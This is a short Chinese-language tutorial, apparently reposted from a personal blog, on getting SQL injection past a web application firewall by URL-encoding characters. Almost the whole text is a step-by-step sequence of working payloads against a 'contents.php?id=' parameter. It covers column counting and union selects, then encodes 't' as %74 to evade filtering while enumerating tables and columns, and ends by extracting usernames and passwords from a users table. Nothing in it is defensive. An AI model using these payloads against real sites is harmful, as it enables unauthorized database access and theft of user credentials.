WAF绕过方法之URL编码

（1）SQL注入点
contents.php?id=3
（2）字段数
contents.php?id=3 order by 4
（3）显示位数4
contents.php?id=3 union select 1，2，3，4
正常
（4）爆出用户名，数据库，版本号
contents.php?id=3 UNION select 1，2，3，contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
出现问题
（5）爆表
contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
尝试绕过不成功
contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
（6）使用URL编码成功绕过（t经过URL编码后为%74）
contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
（7）爆字段
contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users

其中
CONCAT_WS(CHAR(32,58,32),user(),database(),version())   表示爆出用户名，数据库，版本号
CHAR(117, 115, 101, 114, 115)   表示users
0x3a   表示冒号：
group_concat　　用法参考：点这

参考：点这

来源：https://www.cnblogs.com/sxmcACM/p/4068404.html

标签

select

url编码

waf

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!